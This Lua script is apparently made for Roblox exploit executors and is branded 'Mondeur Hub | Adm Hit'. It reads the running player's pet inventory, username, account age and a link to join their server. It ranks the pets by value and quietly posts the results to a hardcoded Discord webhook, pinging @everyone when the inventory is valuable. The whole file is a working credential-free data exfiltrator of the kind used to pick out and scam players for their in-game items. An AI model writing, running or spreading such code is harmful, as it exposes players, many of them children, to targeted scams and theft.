--// MONDEUR HUB | ADM HIT 🦊 (REAL INVENTORY VERSION) - FINAL PERFECT

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Core"):WaitForChild("ClientData"))

-- =========================
-- 🔥 HARDCODED WEBHOOK
-- =========================
local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"

-- 🎯 SMART THRESHOLD SYSTEM
local LOW_THRESHOLD = 300
local HIGH_THRESHOLD = 1500

-- =========================
-- 🌐 REQUEST DETECTION
-- =========================
local requestFunc = (syn and syn.request) or (http and http.request) or http_request or request

if not requestFunc then return end

-- =========================
-- RARITY PRIORITY & COLORS
-- =========================
local rarityPriority = {legendary=5, ultra_rare=4, rare=3, uncommon=2, common=1}
local rarityColors = {legendary=0xFFD700, ultra_rare=0xA020F0, rare=0x1E90FF, uncommon=0x32CD32, common=0xB0B0B0}

-- =========================
-- UNTRADEABLE BLOCKLIST
-- =========================
local untradeablePets = {
    "jerboa", "minigame jerboa", "jiggly jerboa", "starter", "practice", "basic egg", "egg"
}

-- =========================
-- 🏷️ CLEAN EMOJIS
-- =========================
local function getPetEmoji(name, properties)
    if not properties then return "🐾" end
    local e = ""
    if name:find("red fox") then e = "🧑‍🌾"
    elseif name:find("disco bee") then e = "🪩"
    elseif name:find("queen bee") then e = "🐝"
    end
    if properties.mega then e = e .. "🌈" end
    if properties.neon then e = e .. "🟣" end
    if properties.fly then e = e .. "🪽" end
    if properties.ride then e = e .. "🏇" end
    return e ~= "" and e or "🐾"
end

-- =========================
-- 🧠 PERFECT NAME CLEANING
-- =========================
local function cleanPetName(rawId)
    if not rawId then return "" end
    
    local name = tostring(rawId):lower()
    
    -- REMOVE EGGS & PREFIXES
    for _, bad in ipairs(untradeablePets) do
        if name:find(bad) then return "" end
    end
    
    -- SPLIT PROPER NAME (camel → not "basic egg camel")
    name = name:gsub("_", " ")
    
    -- REMOVE NUMBERS/YEARS
    name = name:gsub("%d", "")
    
    -- REMOVE "basic egg ", "japan ", etc prefixes
    name = name:gsub("basic egg%s*", "")
    name = name:gsub("japan%s*", "")
    name = name:gsub("halloween%s*", "")
    name = name:gsub("christmas%s*", "")
    
    -- CLEAN SPACES
    name = name:gsub("%s+", " "):gsub("^%s*(.-)%s*$", "%1")
    
    -- PROPER CASE
    return name:sub(1,1):upper() .. name:sub(2)
end

-- =========================
-- 📦 PROCESS PETS (PERFECT)
-- =========================
local function process(pets)
    local map, total = {}, 0

    for unique_id, pet_data in pairs(pets or {}) do
        if pet_data and pet_data.id then
            local cleanName = cleanPetName(pet_data.id)
            if cleanName == "" then continue end -- SKIP UNTRADEABLE

            if not map[cleanName] then
                map[cleanName] = {
                    name = cleanName,
                    count = 0,
                    rarity = (pet_data.rarity or "common"):lower(),
                    properties = {
                        neon = pet_data.neon or (pet_data.properties and pet_data.properties.neon) or false,
                        mega = pet_data.mega or (pet_data.properties and pet_data.properties.mega) or false,
                        fly = pet_data.flyable or (pet_data.properties and pet_data.properties.flyable) or false,
                        ride = pet_data.rideable or (pet_data.properties and pet_data.properties.rideable) or false
                    }
                }
            end

            map[cleanName].count += 1
            total += 10
        end
    end

    local list = {}
    for name, v in pairs(map) do
        table.insert(list, v)
    end

    -- PERFECT SORT: RARITY #1, COUNT #2
    table.sort(list, function(a, b)
        local aPrio = rarityPriority[a.rarity] or 1
        local bPrio = rarityPriority[b.rarity] or 1
        if aPrio ~= bPrio then return aPrio > bPrio end
        return a.count > b.count
    end)

    return list, total
end

-- =========================
-- 📋 ULTRA CLEAN FORMAT
-- =========================
local function format(list)
    local t = {}
    for i = 1, math.min(#list, 12) do
        local p = list[i]
        table.insert(t, getPetEmoji(p.name:lower(), p.properties) .. " " .. p.name .. " x" .. p.count)
    end
    return (#t > 0 and table.concat(t, "\n")) or "No tradeable pets"
end

-- =========================
-- 📊 TIER
-- =========================
local function getTier(v)
    if v >= HIGH_THRESHOLD then return "🔴 HIGH" end
    if v >= LOW_THRESHOLD then return "🟡 MID" end
    return "🟢 LOW"
end

-- =========================
-- 🚀 RUN (BULLETPROOF)
-- =========================
local function Run(data)
    local list, total = process(data.pets or {})
    
    local bestPet = list[1] or {}
    local best = (bestPet.name and bestPet.count) and (bestPet.name .. " x" .. bestPet.count) or "None"
    local bestRarity = bestPet.rarity or "common"
    local petList = format(list)
    local tier = getTier(total)

    local content = (tier == "🔴 HIGH") and "@everyone" or ""
    local color = rarityColors[bestRarity] or 0x2F3136

    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```" ..
            "👤 Display Name : "..(data.player.displayName or "Unknown").."\n"..
            "🆔 Username     : "..(data.player.username or "Unknown").."\n"..
            "📅 Account Age  : "..(data.player.accountAge or 0).." days\n"..
            "📱 Executor     : "..(data.player.executor or "Unknown").."\n"..
            "👥 Players      : "..(data.player.players or "0/0").."\n"..
            "💰 Total Value  : "..total.."\n"..
            "📊 Tier         : "..tier.."```",
        fields = {
            {name="🏆 Best Pet", value="```"..best.."```"},
            {name="🐶 Pets (Best → Worst)", value="```"..petList.."```"},
            {name="🌐 Join Server", value="[Click to Join]("..(data.joinLink or "https://www.roblox.com")..")"}
        },
        color = color,
        footer = {text = "Mondeuronbotton"}
    }

    pcall(function()
        requestFunc({
            Url = WEBHOOK,
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = HttpService:JSONEncode({content = content, embeds = {embed}})
        })
    end)
end

-- =========================
-- FINAL EXECUTE
-- =========================
local success, inventory = pcall(ClientData.get, ClientData, "inventory")
local pets = (success and inventory and inventory.pets) or {}

Run({
    player = {
        displayName = game.Players.LocalPlayer.DisplayName,
        username = game.Players.LocalPlayer.Name,
        accountAge = game.Players.LocalPlayer.AccountAge,
        executor = identifyexecutor and identifyexecutor() or "Unknown",
        players = #game.Players:GetPlayers() .. "/" .. game.Players.MaxPlayers
    },
    joinLink = "https://www.roblox.com/games/start?placeId=" .. game.PlaceId .. "&instanceId=" .. game.JobId,
    pets = pets
})
